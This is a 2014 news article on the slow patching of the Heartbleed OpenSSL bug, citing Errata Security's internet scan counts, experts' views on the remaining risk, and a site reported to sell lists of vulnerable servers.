Subscribe / Unsubscribe Enewsletters | Login | Register

Pencil Banner

Why you should still worry about Heartbleed

Antone Gonsalves | June 25, 2014
Patching of Internet-connected systems that contain the Heartbleed bug has slowed to a snail's pace, and security experts are advising companies to take extra precautions to avoid a security breach.

Patching of Internet-connected systems that contain the Heartbleed bug has slowed to a snail's pace, and security experts are advising companies to take extra precautions to avoid a security breach.

Errata Security scanned the Internet late Friday and found roughly 309,000 sites with the bug, which is in the secure sockets layer (SSL) library of the OpenSSL Project. That number was only about 9,000 less than what Errata found a month ago.

When Hearbleed was discovered in April, Errata found more than 600,000 vulnerable systems on port 443, which is used by default for SSL-secured communications between clients and servers.

"This indicates people have stopped even trying to patch," Robert Graham, a security researcher at Errata, said Saturday in the company's blog. "We should see a slow decrease over the next decade as older systems are slowly replaced."

That's bad news for users of those sites. The Heartbleed bug could let attackers access some of the most sensitive information on a site, including encryption keys and usernames and passwords of users.

The slowdown in patching and the number of unfixed systems did not surprise experts, who said the remaining servers likely belong to small businesses or sites that cannot afford the cost of deploying the fix.

About a half million SSL certificates were affected by the bug, which means they eventually had to be revoked and then replaced, Robert Miller, senior consultant at SecureState, said.

"It's going to take time to do that and some small companies might not have the money," Miller said. In the meantime, "the risk is still very high."

Errata did not list the domain names of the vulnerable sites and did not try to call the contacts listed with the domains.

Reaching out to them "would cause more problems than it would solve," Robert Graham, security researcher for the company, said in the comments section of the Errata blog.

However, that isn't the case of another site called un1c0rn.net, pronounced "unicorn." The site is selling information on sites it found with the Heartbleed bug.

Robert Hansen, vice president of WhiteHat Security's advanced technology group, estimates that there are about 75,000 websites listed on un1c0rn.net. Hansen provides details on the site on the WhiteHat blog.

"Anybody who uses those sites is vulnerable as long as the attackers have that information," Hansen told CSOonline. "No one should be using any of the sites on unicorn."

Companies should use one of the free scanning tools made available by vendors to check their own servers and, if possible, the sites that they know employees use, experts say.

Businesses also need to contact partner sites and cloud service providers to ensure that they are not vulnerable to an attacker exploiting Heartbleed, Miller said.

 

1  2  Next Page 

Sign up for MIS Asia eNewsletters.